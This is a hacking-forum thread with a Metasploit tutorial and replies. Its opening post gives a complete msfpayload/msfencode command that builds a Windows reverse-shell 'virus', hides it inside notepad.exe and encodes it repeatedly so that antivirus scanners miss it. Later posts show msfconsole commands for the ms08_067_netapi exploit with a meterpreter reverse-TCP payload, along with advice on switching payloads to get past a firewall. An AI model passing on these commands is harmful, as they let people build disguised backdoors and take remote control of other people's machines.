Metasploit (msfencode) - System Security

D0WNGRADE

[align=center]D0WNGRADE[/align]

Hello everyone! This will be my first tutorial on here. Before I start I would like to encourage you all to vote on my other thread for which programming language you would like a video tutorial series on. :)

Now, on to the tutorial!

Metasploit is a very nice framework. If you don't know about it, head on over to www.metasploit.com. It's basically an exploit framework. You can even make your own exploits (using ruby) with their own template...if you all wish, I can make another tutorial covering how to make your own exploit in Metasploit. :)
Metasploit is available on Windows and Linux, but they also have a UNIX version you can use to run it on a Mac.

Now, I'm going to be doing this on a Linux VM. The commands should work on the UNIX version too, but I've never used the Windows version...it might have a GUI. But, I'm not sure. (correct me if I'm wrong) So, first I'll write the command, then I'll break it down:

./msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=8888 R | ./msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -c 10 -o ex.exe

Okay, now, the ./msfpayload basically accesses payloads directly. windows/shell/reverse_tcp is the payload we're selecting. LHOST=127.0.0.1 LPORT=8888 are the payload's options/parameters. A pipe ( | ) let's you throw the output of one command, in our case msfpayload, into another. ./msfencode is the command we'll run to encode our "virus". -x notepad.exe this will be ran and will be seen as this to most virus scanners. -t exe means we'll be outputting a .exe file. -e x86/shikata_ga_nai is the encoding algorithm we're using. -c 10 is the number of times we'll encode the "virus". -o ex.exe is the filename we're outputting.

...and that's it! Keep in mind, this is just a msfencode tutorial. If you want a different tutorial, please post a reply!

Thanks!!
~D0WNGRADE

EDIT: Forgot the "./" infront of msfencode.

Bursihido

bro can u please make tutorial on cracking and writing exploits ?

D0WNGRADE

said:

bro can u please make tutorial on cracking and writing exploits ?

Sure, with Metasploit? Or just in general?? :)

Bursihido

said:

said:

bro can u please make tutorial on cracking and writing exploits ?

Sure, with Metasploit? Or just in general?? :)

In General :)

D0WNGRADE

said:

said:

said:

bro can u please make tutorial on cracking and writing exploits ?

Sure, with Metasploit? Or just in general?? :)

In General :)

I am currently writing a program for learning to write exploits/crack. View the thread here. :)

undead

Nice tut D0WNGRADE! Good work

D0WNGRADE

said:

Nice tut D0WNGRADE! Good work

Thanks! :D

Corrosion

Lets say you wanted to code a windows based rat with out a metasploit shell?

longrifle0x

First sorry I am new here I know it's not correct thread sorry admin!

So i want few help. I was trying to hack my lan PC but I don't know why i could not this.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

http://s41.radikal.ru/i092/1107/1a/395afa20657e.png

I think problem is firewall or I want other exploit but I am new and I don't know which exploit I need if any one can my help please post here or PM me. thanks all.

nu11byte

said:

said:

said:

bro can u please make tutorial on cracking and writing exploits ?

Sure, with Metasploit? Or just in general?? :)

In General :)

How the fuck did this joker get moderator?

D0WNGRADE

said:

First sorry I am new here I know it's not correct thread sorry admin!

So i want few help. I was trying to hack my lan PC but I don't know why i could not this.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

http://s41.radikal.ru/i092/1107/1a/395afa20657e.png

I think problem is firewall or I want other exploit but I am new and I don't know which exploit I need if any one can my help please post here or PM me. thanks all.

Yes, that is usually the result of some-sort of Firewall. I wouldn't recommend using meterpreter all the time. By using the payload windows/shell/reverse_tcp, NOT windows/shell_reverse_tcp. This is because the "shell/" ones are just the needed code to exploit the machine, the other "/shell_[whatever]" contains all the code of the payload. Try using "windows/shell/reverse_tcp" or whatever you would like instead. :)

longrifle0x

D0WNGRADE

thanks for reply. I used "payload windows/shell/reverse_tcp" this payload but result:
I
use exploit:windows/smb/ms08_067_netapi
payload: windows/shell/reverse_tcp
[*] Exploit completed, but no session was created.

II
use exploit windows/shell/reverse_tcp
payload: windows/shell/reverse_tcp
http://i032.radikal.ru/1107/4c/318dd6641c98.png
what you think have i other way?

Xin

Fire up a packet analyser and it will tell you what happened.

longrifle0x

Xinapse

Please if you can tell me how. thanks.

Sh3llc0d3

apt-get install wireshark

then open it up and start running it on your connected device.

longrifle0x

http://s007.radikal.ru/i300/1107/32/53a9b4220514.png

WTF?! which permission he want?

tareifz

are you try to install wireshark?
need root permission

Sh3llc0d3

said:

http://s007.radikal.ru/i300/1107/32/53a9b4220514.png

WTF?! which permission he want?

Yeah you need root, unless you create a new group. Below shows how I believe:
https://blog.wireshark.org/2010/02/runn ... rk-as-you/

longrifle0x

tareifz

I already installed but I can't use :( idk why :X [hr]
Sh3llc0d3

thanks I will try

Howdy, Stranger!

Top Posters

Who's Online (2)